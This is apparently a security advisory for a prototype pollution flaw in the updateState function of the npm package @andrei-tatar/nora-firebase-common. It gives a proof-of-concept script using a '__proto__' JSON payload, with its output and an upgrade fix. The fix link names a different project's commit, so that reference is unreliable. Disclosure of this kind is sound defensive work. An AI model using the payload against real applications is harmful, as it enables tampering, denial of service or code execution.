All versions of this module are vulnerable to Prototype Pollution via updateState. The user's supplied value find its path to the vulnerable function updateStateInternal recursively copy all child properties in the source "user's supplied value" to the destination without proper security validation.
An attacker can exploit this vulnerability by manipulate the prototype of Object by modify built-in Object.prototype through reachable special properties __proto__ or constructor.prototype. Potentially leading to the alteration of behavior of all objects and consequently, the attacker escalate the attack to denial of service, remote code execution or privilege escalation.
updateStateInternal (nora-firebase-common/build/update-state.js:54)
Module.updateState (nora-firebase-common/build/update-state.js:6)
(async () => {
const lib = await import('@andrei-tatar/nora-firebase-common');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}')
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
lib.updateState (BAD_JSON, {})
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();Output:
Before Attack: {}
After Attack: {"polluted":true}
Expected output after the patch:
Before Attack: {}
After Attack: {}
upgrade to version 1.12.3 or a later version
https://github.com/Blackprint/engine-js/commit/bd6b965b03c467e7a58ab0cb89b9172fa5e07013